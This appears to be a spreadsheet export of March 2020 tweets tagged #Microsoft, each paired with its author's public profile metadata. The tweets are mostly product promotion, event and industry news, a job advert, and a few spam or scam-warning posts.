    <t>{'id': 761887213, 'id_str': '761887213', 'name': 'Florian Rappl', 'screen_name': 'FlorianRappl', 'location': 'Munich, Germany', 'description': 'All about #scalable distributed #web #apps using #react #typescript #nodejs and #dotnet @smapiot!\n\n@microsoft #mvp. #author #architect #developer and #speaker.', 'url': 'https://t.co/VvZhuUMBHn', 'entities': {'url': {'urls': [{'url': 'https://t.co/VvZhuUMBHn', 'expanded_url': 'https://florian-rappl.de', 'display_url': 'florian-rappl.de', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 458, 'friends_count': 121, 'listed_count': 42, 'created_at': 'Thu Aug 16 16:41:16 +0000 2012', 'favourites_count': 454, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1397,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'http://pbs.twimg.com/profile_images/1177096872579731458/IHg9ZP0M_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1177096872579731458/IHg9ZP0M_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/761887213/1569476740',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</si>
  <si>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20:58:40 +0000 2020</t>
  </si>
  <si>
    <t>For those in the #robotic process automation #RPA space, Charles Lamanna shares an update of how #Microsoft will democratize automation for all organizations with attended &amp;amp; unattended RPA. #MSDyn365 #PowerAutomate #MSPartner https://t.co/RqGpjUzVhK</t>
  </si>
  <si>
    <t>{'id': 84715770, 'id_str': '84715770', 'name': 'Brian Galicia ðŸ€', 'screen_name': 'briangalicia', 'location': 'Redmond, WA', 'description': 'Empowering ISVs to help customers evolve with line-of-business applications built on #MSDyn365 #PowerPlatform @Microsoft | #socialselling | @univpugetsound alum', 'url': 'https://t.co/pQOfQhmSXv', 'entities': {'url': {'urls': [{'url': 'https://t.co/pQOfQhmSXv', 'expanded_url': 'http://www.linkedin.com/in/briangalicia', 'display_url': 'linkedin.com/in/briangalicia', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2249, 'friends_count': 243, 'listed_count': 209, 'created_at': 'Fri Oct 23 23:19:58 +0000 2009', 'favourites_count': 1028, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4683,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'http://pbs.twimg.com/profile_images/886413235745726464/tgAyY7t9_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/886413235745726464/tgAyY7t9_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/84715770/1501217156', 'profile_link_color': '000C59',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</si>
  <si>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Mon Mar 02 20:57:37 +0000 2020</t>
  </si>
  <si>
    <t>Excited to be doing a webinar over in the USA on Wednesday 15th April, 10:30am AM Pacific Daylight Time. Dynamics 365 Finance focused webinar, all about how D365 &amp;amp; Microsoft being the ERP Market Leader!! Register here: https://t.co/JceUxFTEvl
#Microsoft #IngramMicro #Dynamics365 https://t.co/4ntYQfoxR6</t>
  </si>
  <si>
    <t>Mon Mar 02 20:52:40 +0000 2020</t>
  </si>
  <si>
    <t>I like how Microsoft has accessibility to all it's products. If you are poor and can't afford 10 bucks a month for Office 365, you can always use the built-in Mail, Calendar, and To-Do App for Windows 10. They all provide the same functions of Outlook #microsoft #windows10</t>
  </si>
  <si>
    <t>{'id': 1165734611936337921, 'id_str': '1165734611936337921', 'name': 'STEVE | The Wild Card', 'screen_name': 'stevengamatan', 'location': 'Miami, FL', 'description': 'ðŸ˜ºFIU BS Information Technology Alumni\nðŸ¦ˆNSU MS Cybersecurity Engineering Student\nâ™ŒJust a guy from Miami chasing the American Dream.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 36, 'friends_count': 561, 'listed_count': 0, 'created_at': 'Sun Aug 25 21:25:28 +0000 2019', 'favourites_count': 10, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False,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'http://pbs.twimg.com/profile_images/1222020839476027392/rONqVEBX_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1222020839476027392/rONqVEBX_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1165734611936337921/1582584108',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</si>
  <si>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20:52:10 +0000 2020</t>
  </si>
  <si>
    <t>And there it is, #microsoft #mvp summit is now going to be virtual.</t>
  </si>
  <si>
    <t>{'id': 18223890, 'id_str': '18223890', 'name': 'givenscj', 'screen_name': 'givenscj', 'location': 'San Diego, CA', 'description': 'Finance &amp; Privacy is my game, GDPR expert, Native American, Microsoft MVP, CISSP, CCNP, Security Expert, ex-IBMer, patent wiz, call it how it is', 'url': 'https://t.co/iBdCN0OC6M', 'entities': {'url': {'urls': [{'url': 'https://t.co/iBdCN0OC6M', 'expanded_url': 'http://blogs.architectingconnectedsystems.com', 'display_url': 'blogs.architectingconnectedsystems.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3500, 'friends_count': 4609, 'listed_count': 234, 'created_at': 'Thu Dec 18 20:17:23 +0000 2008', 'favourites_count': 9329, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 20211,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'http://pbs.twimg.com/profile_images/1196833409122746368/OB_VYVN2_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1196833409122746368/OB_VYVN2_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/18223890/1425766726',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</si>
  <si>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Mon Mar 02 20:51:47 +0000 2020</t>
  </si>
  <si>
    <t>A great article on how to work with a globally distributed team like @azureadvocates. Take a read. #Microsoft 
https://t.co/rudNyWyEqg</t>
  </si>
  <si>
    <t>{'id': 862504152, 'id_str': '862504152', 'name': 'Piyali Dey ðŸŒ¥ðŸ¥‘', 'screen_name': 'piyali_vancity', 'location': 'North America ', 'description': 'Program Manager @microsoft @azureadvocates ðŸ‘©ðŸ»\u200dðŸ’», speaker, mentor #IEEEWomenInEngineering, diversity champion, https://t.co/VInQF1D5QF ðŸ‡®ðŸ‡³ðŸ‡ºðŸ‡¸ðŸ‡¨ðŸ‡¦', 'url': 'https://t.co/wugg4RFWxg', 'entities': {'url': {'urls': [{'url': 'https://t.co/wugg4RFWxg', 'expanded_url': 'https://www.linkedin.com/in/piyalidey/', 'display_url': 'linkedin.com/in/piyalidey/', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/VInQF1D5QF', 'expanded_url': 'http://pronoun.is/she?or=they', 'display_url': 'pronoun.is/she?or=they', 'indices': [110, 133]}]}}, 'protected': False, 'followers_count': 1778, 'friends_count': 985, 'listed_count': 118, 'created_at': 'Fri Oct 05 04:32:27 +0000 2012', 'favourites_count': 4701, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 7878,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'http://pbs.twimg.com/profile_images/1181278021900099584/d9qXrG02_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1181278021900099584/d9qXrG02_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/862504152/1581132217',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</si>
  <si>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20:50:25 +0000 2020</t>
  </si>
  <si>
    <t>This past week was pretty badass. #gaming #gamer #gaminglife #pax #PAXEast #PAXEast2020 #celeste #hollowknight #scourgethebringer #nintendo #microsoft #valfaris #mana #iconoclasts #IndieGameDev #indiegames #swag #design https://t.co/ux3OumbsPE</t>
  </si>
  <si>
    <t>{'id': 150522966, 'id_str': '150522966', 'name': 'Patrick Branigan @ PAX East', 'screen_name': 'pbranigan', 'location': 'Boston, MA', 'description': 'ðŸ–±ðŸ–¥ Product Designer @Aquent and formerly @dockyard : | : ðŸŽ® gamer and amateur indie game UI dev', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 459, 'friends_count': 376, 'listed_count': 61, 'created_at': 'Tue Jun 01 04:16:58 +0000 2010', 'favourites_count': 252, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 10189,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'http://pbs.twimg.com/profile_images/727962048630542336/Hhlwt4iN_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/727962048630542336/Hhlwt4iN_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/150522966/1462394746',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</si>
  <si>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20:49:15 +0000 2020</t>
  </si>
  <si>
    <t>Dubai #Microsoft summit 2020 - with awesome AI speaker - @johnsantiago   https://t.co/OuA3l9EHrQ</t>
  </si>
  <si>
    <t>{'id': 410842855, 'id_str': '410842855', 'name': 'Toma Koliada', 'screen_name': 'T0MKA', 'location': 'San Francisco, CA', 'description': 'â€œIn God we trust, all others bring dataâ€.ðŸ‘¥', 'url': 'https://t.co/xT85Jpx1FY', 'entities': {'url': {'urls': [{'url': 'https://t.co/xT85Jpx1FY', 'expanded_url': 'https://www.facebook.com/tomkka', 'display_url': 'facebook.com/tomkka', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 61, 'friends_count': 281, 'listed_count': 2, 'created_at': 'Sat Nov 12 17:01:36 +0000 2011', 'favourites_count': 120, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1046505448818585601/Qvv9efKK_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1046505448818585601/Qvv9efKK_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/410842855/1551348955',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</si>
  <si>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20:47:40 +0000 2020</t>
  </si>
  <si>
    <t>Iconic Icons: Microsoft on designing the Windows icons https://t.co/WCXoM0a9qO #microsoft #windows #icons #graphicdesign #graphicdesigner #designer #iconography</t>
  </si>
  <si>
    <t>{'id': 177365454, 'id_str': '177365454', 'name': 'MORAD Creative Agency', 'screen_name': 'MoradCreative', 'location': 'Calgary, Alberta', 'description': 'MORAD Creative Agency builds beautiful brands, advertising and websites that are simple, compelling and differentiated. Contact us for a quote or to chat.', 'url': 'https://t.co/y32vymC5Gw', 'entities': {'url': {'urls': [{'url': 'https://t.co/y32vymC5Gw', 'expanded_url': 'https://moradcreative.com/', 'display_url': 'moradcreative.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4536, 'friends_count': 1420, 'listed_count': 130, 'created_at': 'Wed Aug 11 23:24:42 +0000 2010', 'favourites_count': 676, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 14188,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'http://pbs.twimg.com/profile_images/1229899244565229568/9JzWRTL4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1229899244565229568/9JzWRTL4_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/177365454/1582065806', 'profile_link_color': '16B35A', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'FFFFFF', 'profile_text_color': '16B35A', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Mon Mar 02 20:45:51 +0000 2020</t>
  </si>
  <si>
    <t>Any FREE video editing software out there? #VideoEditingSoftware #Microsoft please come out with another one, lol.</t>
  </si>
  <si>
    <t>{'id': 4911447862, 'id_str': '4911447862', 'name': 'GiltSummer5196', 'screen_name': 'giltsummer5196', 'location': 'Behind a Keyboard', 'description': 'Lady Streamer @twitch &amp; @watchmixer |Partner with @refereum | Instagram @giltsummer5196 | Youtube @giltsummer5196', 'url': 'https://t.co/gdfGKM1PAd', 'entities': {'url': {'urls': [{'url': 'https://t.co/gdfGKM1PAd', 'expanded_url': 'https://www.twitch.tv/giltsummer5196', 'display_url': 'twitch.tv/giltsummer5196', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3875, 'friends_count': 72, 'listed_count': 57, 'created_at': 'Mon Feb 15 01:56:57 +0000 2016', 'favourites_count': 3361, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 10206,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'http://pbs.twimg.com/profile_images/881901618186399744/oG25m2mF_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/881901618186399744/oG25m2mF_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4911447862/1499096723',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</si>
  <si>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20:44:37 +0000 2020</t>
  </si>
  <si>
    <t>Check out Microsoft Xbox 360 S Console model 1439 console only For Parts Only #Microsoft #Xbox360 https://t.co/z9PPjm0gOT via @eBay</t>
  </si>
  <si>
    <t>{'id': 729096620319473664, 'id_str': '729096620319473664', 'name': 'Kenneth Adkins', 'screen_name': 'CrazyKen_retail', 'location': 'Dunnellon, FL', 'description': '', 'url': 'https://t.co/UIKF6lPexb', 'entities': {'url': {'urls': [{'url': 'https://t.co/UIKF6lPexb', 'expanded_url': 'http://stores.ebay.com/Kenny-s-Resale', 'display_url': 'stores.ebay.com/Kenny-s-Resale', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 280, 'friends_count': 813, 'listed_count': 30, 'created_at': 'Sat May 07 23:52:35 +0000 2016', 'favourites_count': 23, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 25928,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'http://pbs.twimg.com/profile_images/732605932077649920/tq_xzD8x_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/732605932077649920/tq_xzD8x_normal.jpg',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</si>
  <si>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20:41:27 +0000 2020</t>
  </si>
  <si>
    <t>Listen to "Activision Wants Respect on Their Name and This Virus is Real" by Untitled Podcast.  https://t.co/0LD5iWpNoH #Xbox #Microsoft #gaming #Activision #Reddit #respek #StardewValley #TheSims</t>
  </si>
  <si>
    <t>{'id': 81804096, 'id_str': '81804096', 'name': 'Samantha Jones', 'screen_name': 'LilacBoots', 'location': 'Mount Vernon, NY', 'description': '28| Co-host of an Untitled Podcast w/ @kajounuj | #Gamer #BlackWomanInTech #BlackAF Twitch: LilacBoots Steam: MadameLilac', 'url': 'https://t.co/vCnR7OeA5O', 'entities': {'url': {'urls': [{'url': 'https://t.co/vCnR7OeA5O', 'expanded_url': 'https://soundcloud.com/samjununtitledpodcast', 'display_url': 'soundcloud.com/samjununtitledâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 83, 'friends_count': 329, 'listed_count': 3, 'created_at': 'Mon Oct 12 09:34:05 +0000 2009', 'favourites_count': 25074, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 12521,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'http://pbs.twimg.com/profile_images/1141844561872007169/9Ko92f6q_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1141844561872007169/9Ko92f6q_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/81804096/1580746192',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</si>
  <si>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Mon Mar 02 20:38:25 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "New PwndLocker Ransomware Targeting U.S. Cities, Enterprises:" https://t.co/iqzPJnPYqJ
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Mon Mar 02 20:37:54 +0000 2020</t>
  </si>
  <si>
    <t>V30215333300012 phone call from #microsoft true or false</t>
  </si>
  <si>
    <t>{'id': 45556215, 'id_str': '45556215', 'name': 'airnation', 'screen_name': 'airnation', 'location': "Les Pays-d'en-Haut, QuÃ©bec", 'description': 'HI!  I follow people with a picture and press media only. Love cooking traveling gardening animals music and photography.  Peace and love to you all.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 29, 'friends_count': 211, 'listed_count': 212, 'created_at': 'Mon Jun 08 12:42:13 +0000 2009', 'favourites_count': 17764, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 77294,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'http://pbs.twimg.com/profile_images/438025809148665857/zgWt0-Aj_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/438025809148665857/zgWt0-Aj_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/45556215/1405390156', 'profile_link_color': 'E81C4F', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'FFF7CC', 'profile_text_color': '0C3E53', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'regular'}</t>
  </si>
  <si>
    <t>Mon Mar 02 20:37:16 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft cancels its IoT in Action conference due to coronavirus #microsoft https://t.co/NgGd1YNxyD https://t.co/Pa1IEt5u7H</t>
  </si>
  <si>
    <t>Mon Mar 02 20:35:01 +0000 2020</t>
  </si>
  <si>
    <t>Better Buy: #Microsoft vs #IBM  https://t.co/4PNL1TPvoF</t>
  </si>
  <si>
    <t>{'id': 4527970337, 'id_str': '4527970337', 'name': 'Eduardo Flores', 'screen_name': 'eduflornet', 'location': 'Madrid, Comunidad de Madrid', 'description': 'App Builder 2017 - MCSD Web Applications - SharePoint Applications. Net Software Engineer', 'url': 'https://t.co/XXbeaXuEts', 'entities': {'url': {'urls': [{'url': 'https://t.co/XXbeaXuEts', 'expanded_url': 'https://eduflornet.wordpress.com', 'display_url': 'eduflornet.wordpress.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 49, 'friends_count': 132, 'listed_count': 10, 'created_at': 'Fri Dec 18 20:02:24 +0000 2015', 'favourites_count': 35, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 292,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'http://pbs.twimg.com/profile_images/677944455471742977/XOTtQjiy_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/677944455471742977/XOTtQjiy_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4527970337/1497800174',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</si>
  <si>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20:33:54 +0000 2020</t>
  </si>
  <si>
    <t>The difference between canvas apps and model apps #mspartner #microsoft #powerapps https://t.co/FanDUayxvF https://t.co/lFjVJfq5y4</t>
  </si>
  <si>
    <t>Mon Mar 02 20:31:42 +0000 2020</t>
  </si>
  <si>
    <t>Closing soon ..... 4.3.20 
#Administration #Assistant
Base: 11 / 12 Portland Square, #Carlisle 
You will work as part of a small team of administrators and  clinicians.  
A good knowledge of #Outlook and #Microsoft is essential. For further details ..... https://t.co/YQQxGiHuPj https://t.co/of4JLolbg8</t>
  </si>
  <si>
    <t>{'id': 3419767301, 'id_str': '3419767301', 'name': 'NHS jobs - NorthEast and North Cumbria', 'screen_name': 'cntw_jobs', 'location': 'North East and North Cumbria, England', 'description': 'Cumbria, Northumberland, Tyne and Wear NHS Foundation Trust is one of the largest mental health and disability care providers in the UK @cntwnhs', 'url': 'https://t.co/Irr8syDOLg', 'entities': {'url': {'urls': [{'url': 'https://t.co/Irr8syDOLg', 'expanded_url': 'http://www.cntw.nhs.uk', 'display_url': 'cntw.nhs.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1041, 'friends_count': 1630, 'listed_count': 21, 'created_at': 'Thu Aug 13 09:04:05 +0000 2015', 'favourites_count': 523, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1819,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'http://pbs.twimg.com/profile_images/1179383791229575173/of57-ef3_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1179383791229575173/of57-ef3_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3419767301/1570021365',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</si>
  <si>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20:30:27 +0000 2020</t>
  </si>
  <si>
    <t>#cloud  #microsoft #SMB     For SMBs, moving to the cloud is proven to help achieve greater profit margins and ROI. Check out this informative infographic to see why it's a game changer.      #Technology #BusinessAutomation #MSDyn365 https://t.co/4bXL13VW4A</t>
  </si>
  <si>
    <t>Mon Mar 02 20:30:21 +0000 2020</t>
  </si>
  <si>
    <t>Why Azure Sphere From Microsoft Is A Big Deal For The IoT Ecosystem via @Forbes 
https://t.co/FXG5l52WaJ
@Ronald_vanLoon @kuriharan @jblefevre60 @mclynd @chboursin @sallyeaves @TmanSpeaks @mvollmer1
#IoT #DigitalTransformation #Tech #Microsoft</t>
  </si>
  <si>
    <t>{'id': 961853244807921665, 'id_str': '961853244807921665', 'name': 'Installed Base', 'screen_name': 'InstalledBase', 'location': 'New Jersey, USA', 'description': 'Forecast &amp; experience market-leading technologies and platforms with #InstalledBase from @InfoClutchData. Reach us @ +1(888) 998-0077 \n#TechnographicData', 'url': 'https://t.co/UPgJvjNRdZ', 'entities': {'url': {'urls': [{'url': 'https://t.co/UPgJvjNRdZ', 'expanded_url': 'https://www.infoclutch.com/installed-base/', 'display_url': 'infoclutch.com/installed-base/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2092, 'friends_count': 3265, 'listed_count': 21, 'created_at': 'Fri Feb 09 06:44:18 +0000 2018', 'favourites_count': 2499, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1692,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'http://pbs.twimg.com/profile_images/961855454363054080/dOH8bkiO_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/961855454363054080/dOH8bkiO_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/961853244807921665/1518159218',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</si>
  <si>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20:30:13 +0000 2020</t>
  </si>
  <si>
    <t>Learn how Microsoft Teams is improving productivity for businesses with our short guide:
https://t.co/h87bkbEOiX #microsoft #microsoftteams #productivity https://t.co/CxUmRfR4oF</t>
  </si>
  <si>
    <t>{'id': 358090922, 'id_str': '358090922', 'name': 'MWLSystems', 'screen_name': 'MWLsystems', 'location': 'Wrexham', 'description': 'MWL Systems is a professional #IT company, delivering proven technology, tailored to the needs of businesses of all sizes. Now part of Elite Group.', 'url': 'https://t.co/1YcrglYL6i', 'entities': {'url': {'urls': [{'url': 'https://t.co/1YcrglYL6i', 'expanded_url': 'http://www.mwlsystems.co.uk', 'display_url': 'mwlsystems.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 938, 'friends_count': 1985, 'listed_count': 27, 'created_at': 'Fri Aug 19 10:58:35 +0000 2011', 'favourites_count': 391, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2875,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'http://pbs.twimg.com/profile_images/465805042436435968/5d5Ize8U_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/465805042436435968/5d5Ize8U_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/358090922/1568286387', 'profile_link_color': 'EF3A27',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</si>
  <si>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Mon Mar 02 20:29:12 +0000 2020</t>
  </si>
  <si>
    <t>New sex video on my site. A little suck. It will be wet #Lincoln   #goddess #microsoft https://t.co/QvnQv2UH31</t>
  </si>
  <si>
    <t>{'id': 1234495182705430529, 'id_str': '1234495182705430529', 'name': 'Sandi Wilkins', 'screen_name': 'jenmortrunskot', 'location': 'Kansas City, USA', 'description': 'Love comes unseen', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 9, 'friends_count': 30, 'listed_count': 0, 'created_at': 'Mon Mar 02 15:06:18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'http://pbs.twimg.com/profile_images/1234512576651939843/IgmpnMz7_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234512576651939843/IgmpnMz7_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234495182705430529/1583165744',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</si>
  <si>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20:28:53 +0000 2020</t>
  </si>
  <si>
    <t>Join us at #HIMSS20 to discover how Allscripts has worked with #Microsoft to create solutions to provide personalized support to patients: https://t.co/2wUxHin6V2 @Health_IT</t>
  </si>
  <si>
    <t>{'id': 21663232, 'id_str': '21663232', 'name': 'Allscripts', 'screen_name': 'Allscripts', 'location': 'Chicago, IL', 'description': 'Leader in Health IT technology solutions that advance clinical, financial and operational results. Get the latest on  industry topics @ http://t.co/BdapZtHNBV.', 'url': 'http://t.co/xgMigqhY4F', 'entities': {'url': {'urls': [{'url': 'http://t.co/xgMigqhY4F', 'expanded_url': 'http://www.allscripts.com', 'display_url': 'allscripts.com', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'http://t.co/BdapZtHNBV', 'expanded_url': 'http://blog.allscripts.com', 'display_url': 'blog.allscripts.com', 'indices': [136, 158]}]}}, 'protected': False, 'followers_count': 21593, 'friends_count': 1030, 'listed_count': 578, 'created_at': 'Mon Feb 23 16:02:12 +0000 2009', 'favourites_count': 678, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5853, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '7CBA02', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1110988231330463744/-ga4dgWu_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1110988231330463744/-ga4dgWu_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/21663232/1553715203', 'profile_link_color': '7BB800',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</si>
  <si>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Mon Mar 02 20:28:32 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft: 44 million user accounts have a serious security problem: https://t.co/4BzTuVhCzX
#Business #Microsoft #Cybersecurity https://t.co/OEnLH9dPkS</t>
  </si>
  <si>
    <t>{'id': 779791043935907840, 'id_str': '779791043935907840', 'name': 'Ingeniousgeeks.com', 'screen_name': 'IngeniousgeeksC', 'location': 'Orange County, California', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 22, 'friends_count': 50, 'listed_count': 1, 'created_at': 'Sat Sep 24 21:14:07 +0000 2016', 'favourites_count': 60, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1346, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/897222111097274368/Rh2y3eIK_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/897222111097274368/Rh2y3eIK_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/779791043935907840/1554353855',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</si>
  <si>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20:23:43 +0000 2020</t>
  </si>
  <si>
    <t>Do you like to eat delicious after sex? I really love #New Milford  #chocolate #microsoft https://t.co/7L7ySrhPUY</t>
  </si>
  <si>
    <t>{'id': 1234240922843516929, 'id_str': '1234240922843516929', 'name': 'Shannon Bilbrey', 'screen_name': 'tuminogodl', 'location': 'Springfield, USA', 'description': 'If you find someone you love in your life, then hang on to that love', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 3, 'friends_count': 25, 'listed_count': 0, 'created_at': 'Sun Mar 01 22:15:47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'http://pbs.twimg.com/profile_images/1234248720784470019/K-VKlkrR_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234248720784470019/K-VKlkrR_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234240922843516929/1583102831',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</si>
  <si>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20:22:20 +0000 2020</t>
  </si>
  <si>
    <t>Azure Offline Backup with Azure Data Box now in preview
https://t.co/YRM1FTsyrx
#Microsoft #Azure #Cloud #Storage #Backup</t>
  </si>
  <si>
    <t>Mon Mar 02 20:21:56 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Goes All-In On RPA (Robotic Process Automation) via @forbes https://t.co/a9q4tOAMSu #Microsoft #RPA #Flow</t>
  </si>
  <si>
    <t>{'id': 422606077, 'id_str': '422606077', 'name': 'Nikesh Das', 'screen_name': 'NikeshDas', 'location': 'UK', 'description': '#MSDynCE #PowerApps #DevOps #Azure #Business #Technology', 'url': 'https://t.co/okAMBg0IGc', 'entities': {'url': {'urls': [{'url': 'https://t.co/okAMBg0IGc', 'expanded_url': 'http://linkedin.com/in/nikeshdas', 'display_url': 'linkedin.com/in/nikeshdas', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 297, 'friends_count': 421, 'listed_count': 112, 'created_at': 'Sun Nov 27 13:18:50 +0000 2011', 'favourites_count': 494, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2543,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'http://pbs.twimg.com/profile_images/1039791984125378560/n6A4W1hL_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1039791984125378560/n6A4W1hL_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/422606077/1470501530',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</si>
  <si>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20:20:25 +0000 2020</t>
  </si>
  <si>
    <t>Refund scammer - (855) 948-3681 - #Scammer #Scambait #TSU #Refund #Scam #Info #Information #Windows #Microsoft - https://t.co/uuJ7NT1Dm6</t>
  </si>
  <si>
    <t>Mon Mar 02 20:20:15 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Dynamics CRM integration lets users sync leads and contacts between Marketo Engage and Microsoft Dynamics. https://t.co/HOBFvw3JFU</t>
  </si>
  <si>
